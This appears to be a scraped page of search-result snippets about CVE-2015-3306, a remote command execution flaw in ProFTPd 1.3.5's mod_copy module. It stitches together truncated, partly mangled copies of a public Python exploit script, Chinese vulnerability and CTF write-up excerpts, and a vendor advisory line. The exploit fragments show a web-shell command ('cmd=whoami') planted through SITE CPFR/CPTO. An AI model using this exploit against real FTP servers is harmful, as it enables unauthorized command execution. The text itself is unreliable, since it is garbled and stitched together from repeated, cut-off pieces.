/usr/bin/env python# CVE-2015-3306 exploit by t0kx# https://github.com/t0kx/exploit-CVE-2015-3306importreimportsocketimportrequestsimportargparseclassExploit:def__init__(self, host, port, path):self.__sock =Noneself.__host = hostself.__port = portself.__path = pathdef__connect(self)...
近日,开源 FTP 服务器程序 ProFTPd 被曝出一个未授权文件复制漏洞(CVE-2015-3306),该漏洞是由于 ProFTPd 中的 mod_copy 模块造成的。攻击者在一定条件下可利用该漏洞直接获得服务器权限。通过网络空间搜索引擎 ZoomEye 进行全网搜索,发现 ProFTPd 在全球网络空间中被普遍使用,该漏洞对欧美国家的服务器影响较大,中国...
Secure your Linux systems from CVE-2015-3306. Stay ahead of potential threats with the latest security updates from SUSE.
# https://github.com/t0kx/exploit-CVE-2015-3306 importre importsocket importrequests importargparse classExploit: def__init__(self,host,port,path): self.__sock=None self.__host=host self.__port=port self.__path=path def__connect(self): ...
proftpd 远程代码执行 (CVE-2015-3306) 目录 1、漏洞描述 2、访问ip:port 3、漏洞利用 4、Exploit 5、web命令执行 6、拿到flag 1、漏洞描述 ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。 ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令...
cmd=whoami") match = re.search('cpto /tmp/.([^"]+)', data.text) return match.group(0)[11::].replace("\n", "") def run(self): self.__connect() self.__exploit() def main(args): print("[+] CVE-2015-3306 exploit by t0kx") print("[+] Exploiting " + args.host + ":...
#!/usr/bin/env python # CVE-2015-3306 exploit by t0kx # https://github.com/t0kx/exploit-CVE-2015-3306 import re import socket import requests import argparse class Exploit: def __init__(self, host, port, path): self.__sock = None self.__host = host self.__port = port self....
ProFTPd 1.3.5 - (mod_copy) Remote Command Execution exploit and vulnerable container - History for exploit.py - t0kx/exploit-CVE-2015-3306